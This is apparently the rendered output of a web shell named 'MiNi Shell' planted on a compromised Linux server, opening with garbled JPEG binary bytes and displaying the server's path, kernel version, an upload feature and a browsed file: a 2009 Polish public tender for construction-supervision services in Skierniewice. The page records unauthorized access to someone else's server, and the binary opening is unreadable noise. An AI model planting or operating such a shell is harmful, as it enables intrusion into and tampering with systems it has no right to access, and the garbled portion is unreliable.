JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/124496-N-2009.html

<p class="kh_header"><b>Skierniewice: Sprawowanie nadzoru inwestorskiego w branżach:
Część 1 - konstrukcyjno-budowlanej (Nowy Dwór)
Część 2 - konstrukcyjno-budowlanej (Skierniewice)
Część 3 - inst. sanitarnej (Nowy Dwór, w tym: instalacja chłodnicza)
Część 4 - inst. sanitarnej (Skierniewice, w tym: instalacja gazowa)</b><br>
<b>Numer ogłoszenia: 124496 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Sadownictwa i Kwiaciarstwa , ul. Pomologiczna 18, 96-100 Skierniewice, woj. łódzkie, tel. 046 8332021, faks 046 8333228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.insad.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie nadzoru inwestorskiego w branżach:
Część 1 - konstrukcyjno-budowlanej (Nowy Dwór)
Część 2 - konstrukcyjno-budowlanej (Skierniewice)
Część 3 - inst. sanitarnej (Nowy Dwór, w tym: instalacja chłodnicza)
Część 4 - inst. sanitarnej (Skierniewice, w tym: instalacja gazowa).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Pełnienie obowiązków inspektora nadzoru inwestorskiego w zakresie dla części:
Część 1:     pełnienie obowiązków inspektora nadzoru inwestorskiego w branży konstrukcyjno-budowlanej dla inwestycji:
Budowa Chłodni Doświadczalnej z Pracownią do Oceny Jakości Pozbiorczej Owoców
Część 2:     pełnienie obowiązków inspektora nadzoru inwestorskiego w branży konstrukcyjno-budowlanej dla inwestycji:
Modernizacja systemu ogrzewania ORO
Część 3:     pełnienie obowiązków inspektora nadzoru inwestorskiego w branży sanitarnej, w tym: chłodniczej, wod.-kan. z podłączeniem do istniejącej instalacji, dla inwestycji:
Budowa Chłodni Doświadczalnej z Pracownią do Oceny Jakości Pozbiorczej Owoców
Część 4:     pełnienie obowiązków inspektora nadzoru inwestorskiego w branży sanitarnej, w tym: wod.-kan., c.o., gazowej dla inwestycji:
Modernizacja systemu ogrzewania ORO.

Dane techniczne budowanej Chłodni Doświadczalnej:
Budynek jednokondygnacyjny niepodpiwniczony w kształcie litery C o funkcji sezonowej. Konstrukcja obiektu szkieletowa - stalowa konstrukcja nośna, posadowiona na płycie fundamentowej, dachy dwuspadowe. Teren z kostki 477,10 m2 i 85,1 m2 żwirowy chodnik. Powierzchnia zabudowy 484,20 m2, powierzchnia użytkowa 389,10 m2, kubatura 2020,00 m3.
Budynek wyposażony w instalacje: chłodniczą (glikolowa instalacja chłodnicza), wodociągowa (ciepła i zimna woda), kanalizacyjna, zewnętrzne szambo, instalacja wodociągowa podłączona do istniejącego przyłącza zewnętrznego.
W budynku znajdować się będą: chłodnie do owoców i szkółkarskie (pow. ok. 140,00 m2), magazyn, sortownia, pracownie, pokoje biurowe, szatnie, wc, pokój śniadań oraz antresola na maszyny chłodnicze.

Budynek zlokalizowany w Sadzie Ekologicznym ISK w Nowym Dworze gm. Nowy Kawęczyn w odległości ok. 3 km od drogi Skierniewice - Rawa Mazowiecka.

Zakres robót objętych nadzorem inwestorskim wielobranżowym określa:
- Kompletna dokumentacja budowlano-wykonawcza.
- Specyfikacja techniczna wykonania i odbioru robót.
- Umowa o roboty budowlane.

Oddział Roślin Ozdobnych zlokalizowany jest w Skierniewicach przy ul. Waryńskiego 14.

Zakres robót do Modernizacji systemu ogrzewania ORO:
1. Rozbiórka komina stalowego zewnętrznego.
2. Demontaż istniejących urządzeń, roboty rozbiórkowe budowlane i adaptacyjne budynku kotłowni (wymiana stolarki okiennej i drzwiowej, zamurowanie otworów, wykonanie tynków wewnętrznych, wykonanie posadzki i okładzin ściennych, itp.). Powierzchnia zabudowy 165,00 m2, kubatura - 891,00 m3.
3. Wykonanie fundamentu pod kominy i kominów.
4. Technologia kotłowni gazowej w oparciu o dwa kotły wodne opalane gazem ziemnym o znamionowej mocy cieplnej 950 kW każdy.
5. Wewnętrzna instalacja gazowa w kotłowni.
6. Wykonanie stacji redukcyjno-pomiarowej zlokalizowanej w linii ogrodzenia działki.
7. Wykonanie zewnętrznej instalacji gazu od stacji redukcyjno-pomiarowej.
8. Wykonanie szafki gazowej zlokalizowanej na ścianie budynku kotłowni.

Zakres robót objętych nadzorem inwestorskim wielobranżowym określa:
- Projekt modernizacji systemu ogrzewania - kotłownia główna
- Projekt modernizacji systemu ogrzewania - stacja redukcyjno-pomiarowa, zewnętrzna i wewnętrzna instalacja gazu
- Projekt budowlano-wykonawczy fundamentu i konstrukcji pod kominy
- Projekt rozbiórki komina
- Specyfikacja techniczna wykonania i odbioru robót.
- Umowa o roboty budowlane.

Dokumenty przedmiotowej inwestycji znajdują się do wglądu w siedzibie Zamawiającego.

Obowiązki inspektora nadzoru:
1.	Reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji z projektem, SIWZ, STWiOR i pozwoleniem na budowę, aktualnymi przepisami oraz zasadami wiedzy technicznej oraz umowami o realizację inwestycji.
2.	Realizacja obowiązków wynikających z postanowienia art. 25 i art. 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2006 r. Nr 156, poz. 1118, z późn. zm.) oraz przepisów wykonawczych.
3.	Udział w przekazaniu przez Zamawiającego placu i terenu budowy Wykonawcy robót (polecenie rozpoczęcia prac).
4.	Dbanie o interesy Zamawiającego przez podejmowanie czynności zapewniających techniczną poprawność realizowanej inwestycji, potwierdzonych wpisem do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonanie prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych.
5.	Nadzór nad terminowością realizacji prac w szczególności w zakresie dotrzymania terminu zakończenia prac i uzyskania przez Wykonawcę robót wszelkich dokumentów koniecznych dla odbioru przedmiotu umowy i przekazania do użytkowania.
6.	Sprawdzenie prawidłowości wykonania robót zgodnie z opracowaną dokumentacją techniczną, pozwoleniem na budowę, przepisami prawa, normami technicznymi, zasadami wiedzy technicznej oraz SIWZ i STWiORB.
7.	Udział w zorganizowanych naradach roboczych na budowie.
8.	Potwierdzanie wykonania robót w protokołach częściowych (końcowych) odbioru robót do fakturowania (kontrola faktycznie wykonanych prac).
9.	Udział w czynnościach związanych z ujawnieniem i usunięciem wad w okresie rękojmi oraz przeglądach gwarancyjnych organizowanych przez Zamawiającego.
10.	Żądanie od Kierownika budowy lub robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenia bądź spowodować niedopuszczalną niezgodność z obowiązującymi normami i przepisami.
11.	Pobyt na terenie realizowanej inwestycji w zależności od rzeczywistych potrzeb oraz na każde żądanie Wykonawcy i Zamawiającego, udział w odbiorach przejściowych, częściowych i końcowych.
12.	Sprawdzanie i odbiór robót ulegających zakryciu lub zanikających, potwierdzony wpisem w dzienniku budowy i protokołach odbioru.
13.	Uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru obiektu budowlanego.
14.	Sprawdzanie, jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie.
15.	Potwierdzenie usunięcia wad wpisem w dzienniku budowy.
16.	Kontrolowanie zgodności robót w zakresie terminowości ich wykonania.
17.	Potwierdzanie faktycznie wykonanego zakresu robót, jako podstawy do fakturowania częściowego.
18.	Zajęcie stanowiska w sprawie możliwości wprowadzenia rozwiązań dodatkowych, nieprzewidzianych, zamiennych, w stosunku do pierwotnie przyjętych, wnioskowanych przez Wykonawcę.
19.	Sygnalizowanie Zamawiającemu o wszelkich okolicznościach mogących mieć wpływ na wykonanie robót oraz o wystąpieniu okoliczności nieprzewidzianych w dokumentacji projektowej.
20.	Spisywanie protokołów konieczności.
21.	Weryfikacja dokumentacji powykonawczej wraz ze złożeniem pisemnego oświadczenia o kompletności dokumentacji powykonawczej.
22.	Kontrolowanie prawidłowego prowadzenia Dziennika Budowy, prawidłowego gromadzenia atestów materiałów, orzeczeń o jakości materiałów, kontrolach wyników badań i innych dokumentów stanowiących załączniki do odbioru robót.
23.	Sprawdzenie i dostarczenie Zamawiającemu trzy dni przed odbiorem końcowym kompletu atestów, certyfikatów zastosowanych materiałów oraz protokołów z pomiarów, prób i sprawdzeń wykonywanych w trakcie trwania robót.
24.	Dyspozycyjność, w tym poprzez kontakt telefonii komórkowej (w dni powszednie).
25.	Współpraca z pozostałymi uczestnikami procesu budowlanego.
26.	Dojazd na budowę we własnym zakresie.
27.	Wszystkie inne pośrednie zadania niezbędne do prawidłowego prowadzenia inwestycji.

Miejsce realizacji zamówienia: 
Budowa Chłodni Doświadczalnej z Pracownią do Oceny Jakości Pozbiorczej Owoców - Nowy Dwór Parcela, gm. Nowy Kawęczyn.
Modernizacja systemu ogrzewania ORO - ul. Waryńskiego 14, Skierniewice.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonywania zamówienia, tj.:
a) wykonali w ostatnich 3 latach przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwie usługi polegające na:
- część 1 - nadzór nad budową obiektu o charakterze pawilonowym o kubaturze nie mniejszej niż 2000 m3, dla którego wartość robót wg kosztorysu wynosiła nie mniej niż 1.000.000,-zł bez podatku VAT i nadzór nad budową obiektu użyteczności publicznej lub usługowego o kubaturze nie mniejszej niż 2000 m3, dla którego wartość robót wg kosztorysu wynosiła nie mniej niż 1.000.000,-zł bez podatku VAT;
- część 2 - nadzór nad budową, rozbudową, przebudową obiektu o charakterze przemysłowym, dla którego wartość robót wg kosztorysu wynosiła nie mniej niż 200.000,-zł bez podatku VAT;
- część 3 - nadzór nad budową instalacji wod.-kan., chłodniczą, w obiektach chłodniczych, dla których wartość robót wg kosztorysu wynosiła nie mniej niż 400.000,-zł bez podatku VAT;
- część 4 - nadzór nad budową, przebudową, modernizacją instalacji gazowej, wod.-kan., c.o., w kotłowni, dla której wartość robót wg kosztorysu wynosiła nie mniej niż 500.000,-zł bez podatku VAT;
b) dysponują osobami: 
- część 1 - z uprawnieniami do nadzorowania w specjalności konstrukcyjno-budowlanej bez ograniczeń robót budowlanych i minimum 4 letnim doświadczeniem;
- część 2 - z uprawnieniami do nadzorowania w specjalności konstrukcyjno-budowlanej bez ograniczeń robót budowlanych i minimum 4 letnim doświadczeniem;
- część 3 - z uprawnieniami do nadzorowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń do nadzorowania robót budowlanych i minimum 4 letnim doświadczeniem;
- część 4 - z uprawnieniami do nadzorowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do nadzorowania robót budowlanych i minimum 4 letnim doświadczeniem;
c) posiadają ubezpieczenia z tytułu odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem samodzielnych funkcji technicznych w budownictwie;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy Pzp.
2 W przypadku składania ofert wspólnych warunki określone w ppkt 2 i 3 mogą być spełnione łącznie przez Wykonawców występujących wspólnie. Pozostałe warunki musi spełnić każdy z Wykonawców.
3 Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia wyłącznie w oparciu o oświadczenia i dokumenty załączone do oferty, opisane w części 9 specyfikacji.
Niespełnienie wymaganych warunków spowoduje wykluczenie Wykonawcy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 Oświadczenie Wykonawcy o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy Pzp oraz o niepodleganiu wykluczeniu na mocy art. 24 ust. 1 i 2 ustawy Pzp - załącznik nr 1; 
2 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3 Wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia (minimum dwie usługi), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie - załącznik nr 2. 
      Jako odpowiadające swoim rodzajem, Zamawiający uzna usługi, polegające na: 
- część 1 - nadzór nad budową obiektu o charakterze pawilonowym o kubaturze nie mniejszej niż 2000 m3, dla którego wartość robót wg kosztorysu wynosiła nie mniej niż 1.000.000,-zł bez podatku VAT i nadzór nad budową obiektu użyteczności publicznej lub usługowego o kubaturze nie mniejszej niż 2000 m3, dla którego wartość robót wg kosztorysu wynosiła nie mniej niż 1.000.000,-zł bez podatku VAT;
- część 2 - nadzór nad budową rozbudowa, przebudową obiektu o charakterze przemysłowym, dla którego wartość robót wg kosztorysu wynosiła nie mniej niż 200.000,-zł bez podatku VAT;
- część 3 - nadzór nad budową instalacji wod.-kan., chłodniczą, w obiektach chłodniczych, dla których wartość robót wg kosztorysu wynosiła nie mniej niż 400.000,-zł bez podatku VAT;
- część 4 - nadzór nad budową, przebudową, modernizacją instalacji gazowej wod.-kan., c.o., w kotłowni, dla której wartość robót wg kosztorysu wynosiła nie mniej niż 500.000,-zł bez podatku VAT;
4 Wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
5 Zaświadczenie lub inny dokument ubezpieczenia z tytułu odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem samodzielnych funkcji technicznych w budownictwie. 
6 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa pkt 2 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Ww. dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
7 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
8 Zasady udziału w postępowaniu Wykonawców występujących wspólnie:
8.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
8.2. Wykonawcy ci składają jedną ofertę, przy czym:
- oświadczenie potwierdzające spełnianie warunków określonych w art. 22 ust. 1 ustawy Pzp w części obejmującej warunki wskazane w art. 22 ust. 1 pkt 1 i 4 oraz o niepodleganiu wykluczeniu na mocy art. 24 ust. 1 i 2 - składa każdy z Wykonawców, zaś w części obejmującej art. 22 ust. 1 pkt 2 i 3 - składają wszyscy Wykonawcy wspólnie,
- pozostałe dokumenty składają wszyscy Wykonawcy wspólnie.
8.3. Przed podpisaniem umowy (w przypadku wygrania przetargu) Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum.
9 Dokumenty mogą być przedłożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku, gdy złożona przez Wykonawcę kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości, co do jej prawidłowości Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.insad.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Sadownictwa i Kwiaciarstwa w Skierniewicach, ul. Pomologiczna 18 pok. nr 19..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 12:00, miejsce: Instytut Sadownictwa i Kwiaciarstwa w Skierniewicach, ul. Pomologiczna 18 pok. nr 21 - sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> konstrukcyjno-budowlanej (Nowy Dwór).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego w branży konstrukcyjno-budowlanej dla inwestycji:
Budowa Chłodni Doświadczalnej z Pracownią do Oceny Jakości Pozbiorczej Owoców.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> konstrukcyjno-budowlanej (Skierniewice).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego w branży konstrukcyjno-budowlanej dla inwestycji:
Modernizacja systemu ogrzewania ORO.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> inst. sanitarnej (Nowy Dwór, w tym: instalacja chłodnicza).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego w branży sanitarnej, w tym: chłodniczej, wod.-kan. z podłączeniem do istniejącej instalacji, dla inwestycji:
Budowa Chłodni Doświadczalnej z Pracownią do Oceny Jakości Pozbiorczej Owoców.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> inst. sanitarnej (Skierniewice, w tym: instalacja gazowa).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego w branży sanitarnej, w tym: wod.-kan., c.o., gazowej dla inwestycji:
Modernizacja systemu ogrzewania ORO.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com